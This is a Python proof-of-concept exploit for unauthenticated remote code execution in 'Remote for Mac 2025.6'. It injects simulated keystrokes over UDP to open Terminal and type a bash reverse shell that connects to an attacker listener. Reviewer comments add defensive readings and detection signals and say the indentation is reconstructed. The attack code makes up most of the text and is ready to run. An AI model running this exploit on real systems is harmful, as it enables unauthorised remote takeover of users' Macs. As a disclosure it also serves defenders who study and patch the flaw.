# Exploit Title: Remote for Mac 2025.6 - Remote Code Execution (RCE)
# Date: 2025-05-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6

#!/usr/bin/env python3

'''
The vulnerability in Remote for Mac 2025.6 allows an unauthenticated remote
attacker to achieve Remote Code Execution (RCE) by sending a crafted sequence
of UDP packets that simulate keyboard input.

- Works when "Allow unknown devices" setting is enabled (default: disabled)

# Identification:

nmap -p- -T4 --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer
'''

# NOTE(review): this listing was collapsed onto one line on the page, so the
# indentation below is reconstructed. In particular, whether each sleep() call
# belongs inside or after the loop that precedes it cannot be determined from
# the page.
#
# Defensive reading of this proof of concept:
# - The stated precondition is that "Allow unknown devices" is enabled. The
#   advisory says it is disabled by default, so keeping it disabled removes
#   the unauthenticated path described here.
# - The script only sends UDP datagrams and never reads a reply. No pairing or
#   authentication exchange is visible before the input packets are accepted.
# - The injected input is ordinary keyboard activity on the host. Useful
#   signals are inbound UDP to the application's listener from hosts that were
#   never paired, and Terminal starting an interactive bash with an outbound
#   TCP connection shortly afterwards.

import socket
from time import sleep

# Lab addresses from the author's test setup. The page does not say whether
# the listener port is fixed or chosen per installation.
target_ip = "192.168.8.102"
target_port = 49229
lhost = "192.168.8.100"
lport = "4444"

# Key-event packets sent first. The author's inline comments describe them as
# Command down, a space character, then Command up. The middle packet uses the
# same "06000300" prefix as the text packets below, followed by UTF-16LE U+0020.
initial_packets_hex = [
    "07000200370001",  # press ⌘ (Command key)
    "07000200370001",
    "060003002000",  # space
    "07000200370000",
    "07000200370000"  # release ⌘
]

# Key event sent after each block of typed text. Presumably Return down/up:
# 0x24 is the macOS virtual key code for Return, and the trailing 01/00 mirrors
# the press/release pattern commented above. Confirm against the protocol.
final_packets_hex = [
    "07000200240001",
    "07000200240000"
]

# Plain UDP socket: connectionless, with no handshake before the first packet.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

print("Starting exploit..")

# Send the Command+space sequence, one datagram per packet.
for i, hex_packet in enumerate(initial_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))
sleep(1)

# Text-input packets are this fixed 4-byte prefix plus one UTF-16LE character.
prefix = bytes.fromhex("06000300")
text = "terminal"

# Type the application name one character per datagram.
for i, ch in enumerate(text):
    ch_utf16le = ch.encode("utf-16le")
    packet = prefix + ch_utf16le
    sock.sendto(packet, (target_ip, target_port))
sleep(2)

# Confirm the typed text with the key event defined in final_packets_hex.
for i, hex_packet in enumerate(final_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))
sleep(2)

# The command is typed into whatever window has focus at this point. The host
# sees it as keyboard input, so it runs with the logged-in user's privileges.
payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"

print(f"Typing the reverse shell payload..")

# Same per-character text packets as above, now carrying the command line.
for i, ch in enumerate(payload):
    ch_utf16le = ch.encode("utf-16le")
    packet = prefix + ch_utf16le
    sock.sendto(packet, (target_ip, target_port))
sleep(2)

print("Executing payload..")

# Final key event; the status message above says this submits the typed command.
for i, hex_packet in enumerate(final_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))
sleep(2)

print("Exploit completed.")
sock.close()